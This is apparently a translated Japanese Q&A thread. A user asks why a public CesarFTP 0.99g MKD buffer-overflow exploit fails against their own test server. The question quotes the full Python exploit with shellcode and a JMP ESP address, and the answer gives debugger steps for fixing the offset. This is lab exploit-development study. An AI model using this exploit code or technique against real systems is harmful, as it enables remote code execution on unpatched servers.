2

cesarftp を実行しているサーバーでテストしました。ollydbg を使用してサーバー上の ftp サーバーをデバッグしました。

私が使用したエクスプロイトはhttp://www.exploit-db.com/exploits/1906/です

#!/usr/bin/python

#CesarFtp 0.99g 0day Exploit

#Proof of Concept: execute calc.exe

#Tested on XP sp2 polish

#Bug found by h07 [h07@interia.pl]

#Date: 10.06.2006



from socket import *



shellcode = ( #execute calc.exe <metasploit.com>

"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"

"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"

"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"

"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"

"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"

"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"

"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"

"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"

"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"

"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"

"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")



def intel_order(i):

    a = chr(i % 256)

    i = i >> 8

    b = chr(i % 256)

    i = i >> 8

    c = chr(i % 256)

    i = i >> 8

    d = chr(i % 256)

    str = "%c%c%c%c" % (a, b, c, d)

    return str



host = "192.168.0.1"

port = 21

user = "ftp"

password = "ftp"

EIP = 0x773D10A4 #jmp esp <shell32.dll XP professional sp2 english>



s = socket(AF_INET, SOCK_STREAM)

s.connect((host, port))

print s.recv(1024)



s.send("user %s\r\n" % (user))

print s.recv(1024)



s.send("pass %s\r\n" % (password))

print s.recv(1024)



buffer = "MKD "

buffer += "\n" * 671

buffer += "A" * 3 + intel_order(EIP)

buffer += "\x90" * 40 + shellcode

buffer += "\r\n"



print "len: %d" % (len(buffer))



s.send(buffer)

print s.recv(1024)



s.close()



#EoF 



# milw0rm.com [2006-06-12]

「JMP ESP」アドレスを正しいアドレスに変更しました (サーバーはポーランド語の XP を実行していないため、英語の XP を実行しています。ollydbg の実行可能モジュールを使用してコマンド「JMP ESP」を検索したところ、これが見つかりました。)

しかし、エクスプロイトは適切に実行されず、ログイン後、ftp サーバーがクラッシュし、シェルが起動しませんでした。

コードは「JMP ESP」領域でのみ変更する必要があるようです..

私は何を間違えましたか?

編集: シェルコードは、適切に実行された場合、calc.exe を起動するようです。これは起こりませんでした。そして明らかに、シェルは得られませんでした。

4

1 に答える 1

0

脆弱な関数がデータを strcpy() ではなく strcat() でコピーしている可能性があります。これは、試行錯誤によってエクスプロイトを作成する際によくある初歩的な間違いです。

読み取られる値はパスであると想定されているため、ここで実際に起こっていることは、文字列が FTP サーバーのルートのパスに連結されている可能性があります。

その場合、アドレスのみを変更するだけでなく、ペイロード文字列内のオフセット (「671」値) を変更する必要があります。残念ながら、これは、悪用が FTP ルートの正確な場所を知ることに依存することも意味します。

デバッガーをアタッチして、ペイロードが送信される前後に何が起こっているかを確認する必要があります。次のことを試してください。

  1. デバッガーを FTP サーバーに接続します。
  2. エクスプロイトを実行します。サーバーがクラッシュします。
  3. これで、EIP は 0x90909090 または 0x0d0d0d0d を指します。コードへの有効なポインター (親関数の戻りアドレス) が見つかるまで、スタックを調べます。
  4. サーバーを強制終了して、最初からやり直してください。
  5. デバッガーを再度アタッチし、見つかった親関数の先頭にブレークポイントを設定します。
  6. エクスプロイトを再度実行します。これでブレークポイントがヒットするはずです。脆弱な関数が見つかるまで、コードを段階的に実行します。これで、どの関数にバグがあり、スタックを破壊する前にスタックがどのように見えるかを確認できます。
于 2013-03-08T21:29:43.277 に答える